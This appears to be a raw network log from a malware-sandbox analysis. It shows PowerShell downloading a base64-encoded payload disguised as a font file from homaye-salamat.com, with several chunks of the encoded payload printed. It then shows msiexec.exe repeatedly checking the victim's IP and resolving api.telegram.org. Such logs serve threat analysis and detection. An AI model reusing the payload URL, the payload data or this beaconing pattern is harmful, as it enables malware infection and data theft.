                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:16:35.199760914 CET1.1.1.1192.168.2.90x351bNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                Mar 12, 2025 19:17:02.054346085 CET1.1.1.1192.168.2.90x6bc6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                • homaye-salamat.com
                                                                                • reallyfreegeoip.org
                                                                                • api.telegram.org
                                                                                • checkip.dyndns.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.951188193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:34.001339912 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:34.477768898 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 37b0fc6257bf746e512a294215919232
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                Mar 12, 2025 19:16:34.482441902 CET127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Mar 12, 2025 19:16:34.587794065 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 7b8ac7c94acd6096c77b2e1e464ed93f
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                Mar 12, 2025 19:16:37.817002058 CET127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Mar 12, 2025 19:16:37.963345051 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: e023c2431d79dee316fdf18e8a402515
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.951191193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:40.315731049 CET127OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Mar 12, 2025 19:16:40.789926052 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:40 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: fec4a837673b762edddffb76d349c009
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.951193193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:43.981410980 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:44.442521095 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: d754b83bcb4b741968c594a4e38b07c7
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.951195193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:47.023869991 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:47.478786945 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: c67bd801915ffeb68685b6d91885dbc8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.951197193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:49.957166910 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:50.445465088 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:50 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: d6da071475c7ee767dbca75f9ee27d69
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.951199193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:52.988992929 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:53.458281994 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:53 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 4d33485406d618f121eec78e715c61ba
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.951201193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:55.930902004 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:56.404968977 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: 375399ecf3f9df1c0d276b21754ac92b
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.951203193.122.130.0806736C:\Windows\SysWOW64\msiexec.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Mar 12, 2025 19:16:59.052536964 CET151OUTGET / HTTP/1.1
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                Host: checkip.dyndns.org
                                                                                Connection: Keep-Alive
                                                                                Mar 12, 2025 19:16:59.542495012 CET321INHTTP/1.1 200 OK
                                                                                Date: Wed, 12 Mar 2025 18:16:59 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 104
                                                                                Connection: keep-alive
                                                                                Cache-Control: no-cache
                                                                                Pragma: no-cache
                                                                                X-Request-ID: ae9fbe40ec1ff7864eb97e4a1eb830fd
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.949685185.10.75.234436652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-12 18:15:36 UTC180OUTGET /top/Collegiant.pfb HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                                Host: homaye-salamat.com
                                                                                Connection: Keep-Alive
                                                                                2025-03-12 18:15:37 UTC385INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                content-type: application/x-font-type1
                                                                                last-modified: Tue, 11 Mar 2025 09:45:17 GMT
                                                                                accept-ranges: bytes
                                                                                content-length: 473400
                                                                                date: Wed, 12 Mar 2025 18:17:14 GMT
                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 68 66 2b 62 75 32 7a 49 46 51 43 44 79 51 43 51 41 31 77 6b 42 49 54 53 5a 6f 50 50 41 4c 6e 47 76 4f 4b 72 5a 6f 48 2b 55 73 38 68 30 6f 48 78 78 77 38 32 6a 79 48 4a 5a 73 48 68 41 49 48 42 2f 30 77 72 32 34 50 70 41 4d 44 68 41 50 78 6d 67 38 38 41 75 74 6f 6b 7a 72 6d 44 38 51 44 41 34 77 43 41 36 51 44 41 34 51 41 78 79 6a 78 72 2f 49 6b 55 43 32 61 42 2b 73 6e 63 67 4d 6b 41 30 65 4b 44 78 77 44 42 37 67 43 44 77 51 53 46 32 32 59 39 42 67 69 42 2b 56 54 71 78 51 56 38 30 57 61 44 36 41 42 6d 67 2f 49 41 69 30 51 6b 42 4a 74 6d 67 2b 67 41 69 63 4f 41 38 67 43 44 77 77 43 42 77 33 2f 4b 69 41 58 34 67 50 4d 41 75 6f 34 4b 66 43 4a 6d 67 2f 41 41 6d 34 48 71 37 67 6a 42 30 6f 44 42 41 49 50 79 41 49 48 71 6f 41 47 37 54 39 6e 51 5a 73 48 67 41 47 61
                                                                                Data Ascii: hf+bu2zIFQCDyQCQA1wkBITSZoPPALnGvOKrZoH+Us8h0oHxxw82jyHJZsHhAIHB/0wr24PpAMDhAPxmg88AutokzrmD8QDA4wCA6QDA4QAxyjxr/IkUC2aB+sncgMkA0eKDxwDB7gCDwQSF22Y9BgiB+VTqxQV80WaD6ABmg/IAi0QkBJtmg+gAicOA8gCDwwCBw3/KiAX4gPMAuo4KfCJmg/AAm4Hq7gjB0oDBAIPyAIHqoAG7T9nQZsHgAGa
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 42 45 62 39 63 79 59 70 65 68 47 45 44 50 78 38 63 6c 78 6b 59 44 48 46 51 71 33 30 46 73 53 65 63 41 70 41 44 6b 71 30 2b 45 73 61 50 71 4c 38 48 49 4f 69 2b 2f 76 78 54 47 6a 4a 67 59 69 72 76 54 5a 37 70 48 6f 47 65 36 52 36 42 6e 75 6b 65 67 5a 37 70 48 6f 47 65 36 52 36 42 6e 75 6b 65 67 58 55 58 41 72 62 36 4e 4f 51 70 59 58 2f 35 67 5a 48 4d 52 69 64 38 48 52 4d 30 53 68 2b 2b 2f 45 74 42 55 38 44 4c 43 2f 48 57 58 6d 6b 65 76 6e 75 50 48 6f 47 65 2f 66 42 55 42 59 59 62 6f 65 49 7a 58 45 44 4b 79 57 52 4f 52 34 64 50 6c 44 6e 4c 5a 77 48 5a 54 6c 44 78 41 57 33 77 49 64 4b 74 32 37 39 38 4c 4e 6f 76 77 7a 56 71 72 46 74 42 52 30 51 7a 72 64 74 7a 7a 64 79 69 42 6c 57 70 62 49 45 37 4a 2f 7a 34 68 61 4c 7a 32 30 31 7a 39 63 43 2b 61 42 44 78 79 58
                                                                                Data Ascii: BEb9cyYpehGEDPx8clxkYDHFQq30FsSecApADkq0+EsaPqL8HIOi+/vxTGjJgYirvTZ7pHoGe6R6BnukegZ7pHoGe6R6BnukegXUXArb6NOQpYX/5gZHMRid8HRM0Sh++/EtBU8DLC/HWXmkevnuPHoGe/fBUBYYboeIzXEDKyWROR4dPlDnLZwHZTlDxAW3wIdKt2798LNovwzVqrFtBR0QzrdtzzdyiBlWpbIE7J/z4haLz201z9cC+aBDxyX
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 50 32 54 30 43 69 79 61 38 6b 4a 7a 47 4f 59 68 6a 58 64 65 36 30 55 36 53 56 76 68 46 39 71 6e 4e 48 6f 53 6e 36 43 2b 57 6b 77 4e 6b 54 33 5a 49 66 6b 67 4d 57 48 31 71 72 62 77 4c 61 35 65 59 76 58 5a 48 52 66 76 4d 4d 4c 2f 78 79 55 67 6f 31 32 54 4d 35 73 48 65 2f 50 46 5a 6b 52 6d 58 49 65 4d 32 76 4d 46 74 53 57 39 35 44 47 61 62 56 62 6e 4c 5a 6f 50 51 7a 6e 2f 38 51 57 31 50 7a 4c 6b 66 4f 65 32 34 57 56 62 4a 68 31 52 5a 6f 56 37 39 53 67 46 6c 67 33 38 77 4c 4f 6c 33 78 57 44 64 78 48 35 65 34 44 2f 33 79 50 43 51 38 34 6b 54 43 4b 30 65 71 54 7a 51 7a 64 4d 61 46 4a 2f 70 4d 53 32 45 39 52 2b 68 34 33 54 57 6f 54 63 4a 59 7a 5a 41 30 35 57 39 58 52 6a 54 41 5a 37 70 48 6f 47 65 36 52 36 42 6e 75 6b 65 67 5a 37 70 48 6f 47 65 36 52 36 42 6e 75
                                                                                Data Ascii: P2T0Ciya8kJzGOYhjXde60U6SVvhF9qnNHoSn6C+WkwNkT3ZIfkgMWH1qrbwLa5eYvXZHRfvMML/xyUgo12TM5sHe/PFZkRmXIeM2vMFtSW95DGabVbnLZoPQzn/8QW1PzLkfOe24WVbJh1RZoV79SgFlg38wLOl3xWDdxH5e4D/3yPCQ84kTCK0eqTzQzdMaFJ/pMS2E9R+h43TWoTcJYzZA05W9XRjTAZ7pHoGe6R6BnukegZ7pHoGe6R6Bnu
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 4b 66 75 59 4e 70 52 6e 55 75 71 55 77 4e 6e 39 2b 38 65 4c 33 63 55 43 2b 6d 55 46 57 78 51 4c 4b 38 6f 6d 7a 6a 59 74 59 34 4f 51 6c 41 52 34 45 73 58 30 35 74 79 73 50 7a 68 65 6c 4c 73 71 6c 59 53 63 55 57 63 32 43 6d 58 65 4f 36 6a 47 37 44 6d 67 53 46 4b 71 62 6b 54 74 6a 66 5a 78 65 77 5a 37 38 38 55 5a 79 78 71 79 68 34 79 37 70 61 59 39 4a 62 32 6c 69 30 55 4c 6a 33 51 6d 4e 6e 58 4b 70 72 4c 31 4c 6f 4a 46 71 4c 45 70 6d 73 48 4a 53 76 72 55 73 77 43 43 4d 63 51 41 62 53 77 39 36 41 6a 4f 4a 46 63 37 35 73 50 37 6b 6f 56 4d 6f 48 71 50 37 6c 52 37 42 6e 73 74 75 46 54 77 4d 59 6f 48 65 36 53 53 4b 48 32 6e 65 6d 37 45 2f 78 75 51 2b 70 42 65 51 63 67 35 49 6f 64 50 67 4f 65 52 47 69 62 37 41 6c 38 34 2b 6d 54 49 54 47 59 74 66 36 54 7a 6b 2b 2b
                                                                                Data Ascii: KfuYNpRnUuqUwNn9+8eL3cUC+mUFWxQLK8omzjYtY4OQlAR4EsX05tysPzhelLsqlYScUWc2CmXeO6jG7DmgSFKqbkTtjfZxewZ788UZyxqyh4y7paY9Jb2li0ULj3QmNnXKprL1LoJFqLEpmsHJSvrUswCCMcQAbSw96AjOJFc75sP7koVMoHqP7lR7BnstuFTwMYoHe6SSKH2nem7E/xuQ+pBeQcg5IodPgOeRGib7Al84+mTITGYtf6Tzk++
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 2b 2b 32 69 7a 35 46 56 4b 54 6a 7a 35 48 4b 2b 35 32 42 43 64 51 6f 45 63 76 4c 64 72 31 33 64 63 6d 39 33 70 79 36 48 49 32 2b 35 61 52 59 52 43 75 43 4d 4d 36 65 34 35 72 39 79 53 42 69 59 5a 59 76 4d 31 62 4b 6f 35 52 31 30 68 2f 39 42 49 50 47 39 49 67 37 4b 4b 50 2b 46 73 34 4f 6b 65 67 61 54 67 70 63 46 65 32 68 58 56 65 4d 7a 61 33 72 42 2f 55 38 4e 6f 35 43 41 74 44 58 52 43 66 36 5a 59 75 44 52 74 63 54 36 6e 57 36 35 76 36 65 42 43 62 5a 74 72 69 2f 2f 2f 6e 75 6b 65 73 6f 6f 65 73 39 6c 2b 4e 74 4a 42 36 58 6b 44 2f 48 63 74 58 47 53 77 38 38 44 6f 4e 54 52 46 55 2b 53 6a 47 31 31 65 6c 52 42 64 65 61 7a 62 74 69 53 70 62 4c 41 65 34 61 32 35 79 70 63 72 35 55 4f 33 70 63 38 4f 38 31 56 4f 6f 6c 73 4f 68 34 50 33 6e 66 71 69 59 41 7a 79 72 4f
                                                                                Data Ascii: ++2iz5FVKTjz5HK+52BCdQoEcvLdr13dcm93py6HI2+5aRYRCuCMM6e45r9ySBiYZYvM1bKo5R10h/9BIPG9Ig7KKP+Fs4OkegaTgpcFe2hXVeMza3rB/U8No5CAtDXRCf6ZYuDRtcT6nW65v6eBCbZtri///nukesooes9l+NtJB6XkD/HctXGSw88DoNTRFU+SjG11elRBdeazbtiSpbLAe4a25ypcr5UO3pc8O81VOolsOh4P3nfqiYAzyrO
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 2f 69 2f 7a 59 2f 39 31 65 61 52 36 68 75 73 78 2f 59 66 4f 31 33 67 47 65 33 4e 4d 4e 72 63 6c 2f 33 56 35 70 48 72 6c 47 6c 39 37 68 38 59 49 65 67 5a 37 4b 48 6f 47 65 36 76 2b 7a 4b 64 62 68 59 66 57 31 33 67 47 65 35 4e 79 70 7a 61 63 73 6b 61 45 4b 51 6b 45 65 36 51 50 38 54 75 63 68 73 46 37 43 6a 52 51 6a 79 56 36 57 53 2f 49 5a 34 4b 63 4a 55 70 57 71 50 5a 6c 68 31 50 4f 72 34 78 46 6e 4a 55 44 66 34 38 62 44 31 61 6b 55 57 64 79 49 49 66 42 65 39 76 53 6b 4f 54 43 6a 63 47 78 55 2f 73 32 5a 6b 4a 49 65 76 71 55 4d 47 59 32 4f 66 73 32 41 42 59 73 59 66 49 52 46 41 52 37 70 4d 52 63 74 4f 68 79 50 6f 77 6c 6c 50 41 7a 38 36 76 78 75 42 78 30 4b 52 55 6c 6a 42 56 44 43 53 2b 43 71 43 57 4d 64 63 58 38 47 66 43 2f 6a 6e 76 32 38 42 45 55 42 48 75
                                                                                Data Ascii: /i/zY/91eaR6husx/YfO13gGe3NMNrcl/3V5pHrlGl97h8YIegZ7KHoGe6v+zKdbhYfW13gGe5NypzacskaEKQkEe6QP8TuchsF7CjRQjyV6WS/IZ4KcJUpWqPZlh1POr4xFnJUDf48bD1akUWdyIIfBe9vSkOTCjcGxU/s2ZkJIevqUMGY2Ofs2ABYsYfIRFAR7pMRctOhyPowllPAz86vxuBx0KRUljBVDCS+CqCWMdcX8GfC/jnv28BEUBHu
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 2f 38 37 2f 57 69 75 47 68 2b 34 73 67 70 33 4f 65 47 44 2b 64 78 41 47 4b 31 74 4e 2b 53 37 45 2f 73 33 79 4f 52 41 45 65 36 54 78 47 53 67 76 35 32 78 35 70 48 72 77 76 45 36 46 63 79 38 67 75 4f 36 49 5a 6e 6b 47 2f 33 65 34 43 6e 76 33 77 56 56 37 70 48 71 48 67 4a 78 44 30 6e 61 72 39 39 71 35 70 33 70 64 38 4f 42 65 44 76 44 34 58 67 49 64 49 62 49 33 73 70 32 70 6a 47 73 6c 42 33 5a 76 53 33 6f 47 64 43 73 6b 77 6e 69 6b 38 68 4a 77 77 76 2f 46 2b 47 52 34 52 2f 49 78 48 41 52 37 70 50 2f 65 77 66 44 7a 54 4d 30 6c 69 47 39 32 33 36 6d 48 75 58 69 79 39 33 38 67 6a 59 65 52 76 54 63 6c 45 53 47 72 67 6f 33 43 51 78 62 77 4d 52 77 45 65 36 51 50 73 2f 35 39 75 41 35 37 6e 62 47 47 67 76 54 78 53 79 63 65 54 75 67 47 48 70 4a 44 39 71 64 36 59 50 35
                                                                                Data Ascii: /87/WiuGh+4sgp3OeGD+dxAGK1tN+S7E/s3yORAEe6TxGSgv52x5pHrwvE6Fcy8guO6IZnkG/3e4Cnv3wVV7pHqHgJxD0nar99q5p3pd8OBeDvD4XgIdIbI3sp2pjGslB3ZvS3oGdCskwnik8hJwwv/F+GR4R/IxHAR7pP/ewfDzTM0liG9236mHuXiy938gjYeRvTclESGrgo3CQxbwMRwEe6QPs/59uA57nbGGgvTxSyceTugGHpJD9qd6YP5
                                                                                2025-03-12 18:15:38 UTC16384INData Raw: 65 67 6c 37 74 79 30 47 65 36 52 36 42 6e 75 6b 65 67 5a 37 70 48 6f 47 65 36 52 36 42 6e 75 6b 65 67 5a 37 70 47 4e 42 47 66 36 33 4d 70 32 66 4d 70 34 74 33 55 47 50 39 74 4a 34 42 6e 76 7a 78 55 50 78 56 7a 6d 48 6a 48 4d 49 38 53 77 6c 6a 61 49 63 54 65 47 48 6a 4f 71 2b 61 4a 4d 6c 6a 58 75 70 4a 78 32 50 64 4b 4d 37 4c 48 32 59 68 54 50 58 58 63 46 6b 6e 48 30 75 67 61 54 75 72 33 6d 36 74 46 6c 2b 66 79 39 36 47 6b 4e 67 6c 77 55 31 4d 57 56 78 5a 68 58 51 42 63 6d 71 31 4a 56 35 44 66 78 6e 4a 43 32 37 56 2f 41 70 44 41 52 37 70 43 71 2b 65 55 31 52 49 6b 37 6e 56 34 49 4a 6b 52 4e 4c 51 74 5a 50 32 5a 49 66 37 43 75 4d 2b 31 65 30 4b 44 6a 7a 35 58 4b 6e 35 7a 36 77 33 56 6c 6e 39 31 43 72 6b 61 34 38 6e 76 4c 61 71 55 68 2b 4c 64 4c 42 44 4c 61
                                                                                Data Ascii: egl7ty0Ge6R6BnukegZ7pHoGe6R6BnukegZ7pGNBGf63Mp2fMp4t3UGP9tJ4BnvzxUPxVzmHjHMI8SwljaIcTeGHjOq+aJMljXupJx2PdKM7LH2YhTPXXcFknH0ugaTur3m6tFl+fy96GkNglwU1MWVxZhXQBcmq1JV5DfxnJC27V/ApDAR7pCq+eU1RIk7nV4IJkRNLQtZP2ZIf7CuM+1e0KDjz5XKn5z6w3Vln91Crka48nvLaqUh+LdLBDLa
